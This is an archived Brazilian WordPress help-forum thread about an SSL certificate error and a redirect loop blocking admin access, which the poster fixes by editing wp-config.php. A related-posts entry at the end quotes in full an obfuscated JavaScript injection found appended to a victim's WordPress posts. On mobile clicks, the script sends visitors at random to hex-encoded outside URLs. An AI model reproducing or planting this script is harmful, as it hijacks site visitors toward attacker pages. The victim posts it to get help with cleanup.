Ir para conteúdo

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

  • 0
Vilmar Martins

Não consigo entrar no Admin do site do meu Wordpress, aparece como site não seguro

Pergunta

Olá, tenho um site no qual utilizo o Wordpress para gerenciamento, mas tive um problema no dia de hoje no qual tento entrar no admin do site aparece na barra de endereço como não seguro e automaticamente me bloqueia e na tela aparece a seguinte mensagem:

 

Sua conexão não é particular

Invasores podem estar tentando roubar suas informações de emagrecendonamedida.com.br (por exemplo, senhas, mensagens ou cartões de crédito).

NET::ERR_CERT_COMMON_NAME_INVALID
 
 Informar automaticamente ao Google detalhes de possíveis incidentes de segurança. Política de Privacidade

 

 

Preciso corrigir o problema, teriam como me ajudarem.

 

Obrigado

Compartilhar este post


Link para o post
Compartilhar em outros sites

6 respostas a esta questão

Recommended Posts

Olá Wilmar tudo bem?

 

Não se preocupe, isso é apenas uma mensagem do chrome dizendo que o seu site não tem HTTPS / SSL, você pode implementar um ssl gratuitamente através do CloudFlare.

 

Neste vídeo eu ensino como instalar um SSL / HTTPS gratuitamente.

 

 

Também vou deixar nossos contatos, caso precise entre em contato conosco.

 

https://www.escolaninjawp.com.br

 

Um abraço.

 

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá,

 

Fiz a implementação do SSL gratuitamente através do CloudFlare, utilizei um vídeo gravado de vocês que tem no Youtube, deu tudo certo, o status no CloudFlare esta verde (ativado), só que quando tento entrar no Admin do Wordpress esta dando erro e não abre a caixa de log para entrar no Wordpress do site. Estou sem acesso a administração do site.

 

http://www.emagrecendonamedida.com.br/wp-admin/

 

O Erro que aparece é o seguinte:

 

A página de www.emagrecendonamedida.com.br não está funcionando

Redirecionamento em excesso por www.emagrecendonamedida.com.br

Tente limpar os cookies.

ERR_TOO_MANY_REDIRECTS

 

 

No erro pede para limpar os cookies do navegador, já limpei tudo, mas continua dando o erro.

 

Poderiam me ajudar, por favor.

 

Obrigado.

 

Compartilhar este post


Link para o post
Compartilhar em outros sites

Consegui resolver o problema.

 

Alterei o arquivo wp.config.php, no cpanel do hostgator incluindo o endereço de url correto, e resolveu o problema.

 

Depois de tanto quebrar a cabeça consegui, ufaa, até que enfim.

 

Valeu Obrigado

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá Vilmar desculpe pela demora não recebi notificação dos conteúdos. Fico feliz que tenha conseguido. Um abraço qualquer coisa nós procure la Na Escola Ninja WP.

Compartilhar este post


Link para o post
Compartilhar em outros sites
Em 30/03/2017 at 16:47, Vilmar Martins disse:

Consegui resolver o problema.

 

Alterei o arquivo wp.config.php, no cpanel do hostgator incluindo o endereço de url correto, e resolveu o problema.

 

Depois de tanto quebrar a cabeça consegui, ufaa, até que enfim.

 

Valeu Obrigado

Boa tarde, você poderia explicar melhor o que fez, também estou com esse problema e não consegui resolver

Compartilhar este post


Link para o post
Compartilhar em outros sites

  • Conteúdo Similar

    • Por douglas79
      Boa noite,
      primeiramente eu fiz um site num servidor local (Wordpress 5.9), criei uma pasta chamada blog e fiz a transferência via FTP para essa pasta, mas não instalei o Wordpress nativo da hospedagem.. Acessei o painel de controle e criei o banco de dados e importei o BD do phpmyadmin do servidor XAMPP. Daí quando vou acessar o domínio www.guardamunparacambi.info/blog, aparece a mensagem "Erro ao conectar com o banco de dados". O que pode estar acontecendo?
      Preciso de ajuda!
    • Por douglas79
      Boa noite,
      primeiramente eu fiz um site num servidor local (Wordpress 5.9), criei uma pasta chamada blog e fiz a transferência via FTP para essa pasta, mas não instalei o Wordpress nativo da hospedagem.. Acessei o painel de controle e criei o banco de dados e importei o BD do phpmyadmin do servidor XAMPP. Daí quando vou acessar o domínio www.guardamunparacambi.info/blog, aparece a mensagem "Erro ao conectar com o banco de dados". O que pode estar acontecendo?
      Preciso de ajuda!
    • Por douglas79
      Boa noite,
      primeiramente eu fiz um site num servidor local (Wordpress 5.9), criei uma pasta chamada blog e fiz a transferência via FTP para essa pasta, mas não instalei o Wordpress nativo da hospedagem.. Acessei o painel de controle e criei o banco de dados e importei o BD do phpmyadmin do servidor XAMPP. Daí quando vou acessar o domínio www.guardamunparacambi.info/blog, aparece a mensagem "Erro ao conectar com o banco de dados". O que pode estar acontecendo?
      Preciso de ajuda!
    • Por douglas79
      Boa noite,
      primeiramente eu fiz um site num servidor local (Wordpress 5.9), criei uma pasta chamada blog e fiz a transferência via FTP para essa pasta, mas não instalei o Wordpress nativo da hospedagem.. Acessei o painel de controle e criei o banco de dados e importei o BD do phpmyadmin do servidor XAMPP. Daí quando vou acessar o domínio www.guardamunparacambi.info/blog, aparece a mensagem "Erro ao conectar com o banco de dados". O que pode estar acontecendo?
      Preciso de ajuda!
    • Por Chirlison
      Estou com um problema no site e gostaria da ajuda dos colegas para poder solucionar a possível brecha de segurança no site.
      Todas as postagens do site apareceram com um código estranho no final de cada uma delas.
      O código é mostrado apenas dentro do editor classic do wordpress. Na página onde o post é listado o código não é mostrado
      Abaixo segue o código inserido no final de cada uma das postagens do site.
       
      <script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x4d\x4f\x4f\x39\x63\x35','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x75\x6d\x52\x38\x63\x35','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x52\x4a\x51\x35\x63\x37','8SJGLkz','random','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x6a\x71\x4a\x31\x63\x38','7196643rGaMMg','setItem','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x7a\x65\x4f\x32\x63\x30','266801SrzfpD','substr','floor','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x65\x57\x65\x34\x63\x35','3ThLcDl','stopPropagation','_blank','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x6e\x65\x56\x33\x63\x38','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x71\x66\x69\x30\x63\x35'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x6b\x4a\x72\x36\x63\x37','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x52\x74\x75\x37\x63\x39',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());</script>  
      Por favor, alguém sabe como esse código pode ter sido inserido por um invasor para que eu possa fechar a possível brecha no código?
      O site foi desenvolvido utilizano wordpress.
      Desde já agradeço a todos que puderem ou tentarem me ajudar a descobrir o que pode ter acontecido.
×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.